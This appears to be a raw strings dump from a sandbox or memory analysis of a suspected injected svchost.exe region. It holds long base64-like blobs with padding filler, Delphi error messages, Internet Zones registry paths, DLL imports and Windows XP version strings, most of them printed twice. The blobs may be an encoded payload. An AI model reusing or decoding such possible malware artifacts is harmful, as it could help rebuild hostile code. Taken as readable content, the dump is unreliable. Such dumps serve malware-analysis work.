pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2

GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

.Method '%s' not supported by automation object/Variant does not reference an automation object

.Method '%s' not supported by automation object/Variant does not reference an automation object

External exception %x

External exception %x

Interface not supported

Interface not supported

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

Invalid variant operation"Variant method calls not supported

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

svchost.exe_932_rwx_01000000_00006000:

.text

.text

`.data

`.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

RPCRT4.dll

RPCRT4.dll

NETAPI32.dll

NETAPI32.dll

ole32.dll

ole32.dll

ntdll.dll

ntdll.dll

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

GetProcessHeap

GetProcessHeap

NtOpenKey

NtOpenKey

svchost.pdb

svchost.pdb

\PIPE\

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

svchost.exe

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512